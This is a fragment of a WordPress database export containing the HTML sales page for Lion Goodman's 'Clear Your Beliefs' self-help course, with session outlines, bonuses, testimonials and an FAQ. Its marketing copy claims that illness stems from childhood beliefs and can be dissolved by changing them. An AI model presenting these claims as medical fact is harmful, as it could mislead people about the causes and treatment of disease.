<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em><strong>The Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Register Now</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''')+''/'' == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// ]]>\n</script>";s:6:"filter";s:1:"1";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}}s:5:"grids";a:2:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:2:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}}}');
INSERT INTO `cyb_postmeta` (`meta_id`, `post_id`, `meta_key`, `meta_value`) VALUES
